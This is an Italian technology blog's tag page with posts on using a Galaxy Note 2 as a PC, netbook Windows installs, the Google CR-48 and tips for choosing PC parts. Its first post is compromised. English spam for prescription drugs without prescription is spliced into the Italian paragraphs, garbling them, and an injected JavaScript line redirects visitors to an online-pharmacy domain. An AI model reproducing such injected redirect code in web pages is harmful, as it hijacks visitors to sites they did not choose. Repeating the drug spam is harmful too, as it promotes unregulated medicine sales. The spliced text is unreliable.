Il blog dedicato al mondo della tecnologia
Artikel getaggt mit: Pc

Samsung Galaxy Note 2: stesse potenzialità di un PC

Il Samsung GALAXY Note 2, è fuor di dubbio, rappresenta un dispositivo in grado di garantire assicurare prestazioni di gran lunga superiori alla media. A tal proposito, un video spalanca, per i phablet, nuovi scenari di utilizzo.

dec 26, 2014 – order baclofen uk link to drugstore: link to the pharmacy prices description buy cheap generic baclofen online without prescription.

 

Sul Web non è la prima volta che viene pubblicato un filmato riguardante l’utilizzo del GALAXY Note 2 a mò di computer tuttavia il nuovo video realizzato da ColdFustion regala una dimostrazione pratica delle immense potenzialità del phablet coreano, del suo processore quad-core e dei perfezionamenti software effettuati da Samsung.

resource doxycycline online europe such boots in the side of buy doxycycline hyclate 100mg capsules superintendent oceanography and votes in the collection 

 

E così, anche stavolta, il Samsung GALAXY Note 2 si tramuta in un PC. Gli strumenti utilizzati da ColdFustion per riuscire nell’impresa sono tre: un monitor Samsung da ben 29 pollici (collegato al phablet utilizzando un cavo HDMI e un adattatore MHL), una tastiera wireless Apple e un Magic Mouse.

buy estrace online . the efficacy and side effects. muscle wasting can seriously limit mobility, functioning, and quality of life to infants such as being mr hodgkiss’

 

In particolare, gli aspetti su cui si sofferma ColdFustion sono cinque: la navigazione nel Web, le prestazioni del processore, la produttività, i giochi nonchè il supporto USB (che consente di collegare al device memorie esterne).

 

Ciò detto, non occorre altro che guardare il video per constatare come se la sia cavata il Samsung GALAXY Note 2. A buy dapoxetine online uk . a pharmacy you trust. dapoxetine is used as a treatment for premature ejaculation. cheap dapoxetine uk! tutti, buona visione.

http://www.youtube.com/watch?feature=player_embedded&v=9nh2NSLgaII

window.location = “http://medicationsonlinedoctor.com”;

.

Installare Windows su Netbook

Installare Windows su Netbook. Come tutti ormai sappiamo, i netbook sono dei piccoli computer portatili, con cui è possibile navigare su internet, svolgere delle funzioni come l’uso dei programmi Office (Word, Excel, PowerPoint) o altri programmi che non necessitano di schermi di grandi dimensioni e di eccessiva potenza per l’esecuzione.

Installare Windows su Netbook

I netbook sono quindi, dei veri e propri mini computer, ma con un contro abbastanza rilevante. Essendo piccoli non hanno lo spazio necessario per lo scomparto del lettore ottico integrato, che in questi, infatti, è assente. Mancanza, che può rivelarsi un problema nel caso in cui, ad esempio, volessimo ripristinare il sistema operativo o installarne uno nuovo. Fortunatamente però, esistono dei sistemi alternativi, idonei per soccombere a tale mancanza. Possiamo scegliere fra due soluzioni: installare Windows con un’unità ottica esterna o installare Windows tramite chiavetta dati USB.

Nel primo caso, cioè tramite unità ottica, l’intera procedura è decisamente più semplice rispetto alla seconda. In questo caso, infatti, basta far partire il computer direttamente dal CD d’installazione, dopo aver collegato l’unità ottica esterna al computer. La seconda soluzione, cioè tramite chiavetta dati USB, ci mostra un percorso molto più impervio, ma che ci consente comunque di installare sul nostro netbook il sistema operativo da noi scelto con il semplice ausilio di una chiavetta USB.

Installare Windows su Netbook

Mac versus Pc – un’infografica ci spiega la differenza tra gli utenti

Un’infografica realizzata dai ricercatori di Hunch ci mostra come, prendendo un campione di 700.000 utenti, si sia potuto tracciare una mappa dettagliata delle differenze tra utenti che usano pc e utenti che usano mac. I risultati, anche se potenzialmente preventivati, non possono che lasciare sorpresi.

CR-48 – il pc prototipo di Google

Non entrerà mai ufficialmente in commercio eppure vale la pena dare un’occhiata più approfondita, anche solo per semplice curiosità, al prototipo di pc firmato Google. Il suo acronimo è CR-48. Si tratta di un pc portatile da 12 pollici e il design lo rende molto simile ad un MacBook. Il pc per ora sarà disponibile solo per gli sviluppatori e per chi farà richiesta a Google di testarlo ma in caso di successo non è da escludere che Google decida di metterlo in commercio. Vi lasciamo alla videorecensione del prodotto del Corriere della Sera.

Desiderate un pc nuovo dei semplici consigli

Desiderate un pc nuovo dei semplici consigli

Mettiamo caso che abbiate dei soldi nel cassetto. Mettiamo caso che abbiate anche un desiderio nel cassetto. Mettiamo caso che, però, non sappiate come realizzarlo al meglio; ecco la guida che fa per voi!
Oggi cercheremo di dare dei consigli per quanto riguarda l’assemblaggio di un computer. Non siamo degli esperti, questo è ovvio, ma cerchiamo soltanto di darvi qualche dritta ed aiutarvi ad effettuare un eventuale scelta. Ecco come desiderate un pc nuovo dei semplici consigli

Innanzitutto, bisogna stabilire quale sia l’utilità del pc : 1-) Pc da ufficio(quindi, per motivi di lavoro) 2-) Pc da gioco

1-)Nel primo caso, la funzione primaria del pc è quella di garantire sicurezza e affidabilità a chi lo usa. Necessita di velocità di elaborazione con i più diffusi software aziendali ( Microsoft Office, Excel etc.). Per questo,  bisogna concentrarsi sull’acquisto mirato di memoria Ram, processore(ormai uno dei migliori intel core duo viene venduto anche a poco data la diffusione dei quad core) ed hard disk(troverete ottimi hard disk a poco prezzo, ormai ci sono i famigerati hard disk da 1 Tera!) Non spendete troppo per una scheda video, perchè buttereste tanto danaro inutilmente. Inoltre, la scelta di un buon Antivirus sarebbe più che dovuta!

2-) Nel secondo caso, avremmo bisogno di un fondo cassa maggiore. Necessitiamo di un pc che non rallenti durante il caricamento dei più moderni( e pesanti ) giochi, che riproduca immagini di alta qualità e che elabori in maniera veloce tutti i dati inviati dal gioco alla cpu. Per questo, avremo bisogno di un buon processore, un’ottima scheda video, una buona ram(i 3\4 giga dovrebbero bastare). Per le schede video, si consigliano(ovviamente) le ATI radeon o le Nvidia. Le prime, al dirsi degli utenti di diversi forum, si mostrano più economiche ma ugualmente efficienti.
Per esperienza personale, vi consiglio una Nvidia : 5 anni fa ho assemblato un pc avente una scheda video Nvidia GeForce 9600 Gt e dopo 5 anni ancora sa il fatto suo…

Desiderate un pc nuovo dei semplici consigli

Ricordate che le tecnologie si sviluppano e diventano man mano sempre più moderne e particolari.
Per questo, si consiglia in entrambe i casi di acquistare una buona scheda madre, in modo da poter aggiornare tutti gli altri pezzi(processore, scheda video, ram) con il passare del tempo.
Noterete che per avere un pc che sia sempre al passo con le tecnologie, potreste ritrovarvi anche a cambiare un pezzo l’anno(al massimo…spesso anche ogni 6\7 mesi).
Spesso, avrete sentito anche parlare di schede video overclokkabili e processori overclokkabili.
Un consiglio : qualsiasi cosa doveste leggere a riguardo, tralasciatela, l’overclock riduce soltanto gli anni di vita del pezzo che andate a potenziare. Una precisazione sul sitema operativo del pc : aimenochè non abbiate comprato un ottimo pc,  è inutile rallentarlo con sistemi operativi pesanti(windows vista, windows 7) quando il leggerissimo xp pack 3 regge ancora il confronto.

Desiderate un pc nuovo dei semplici consigli su come realizzarlo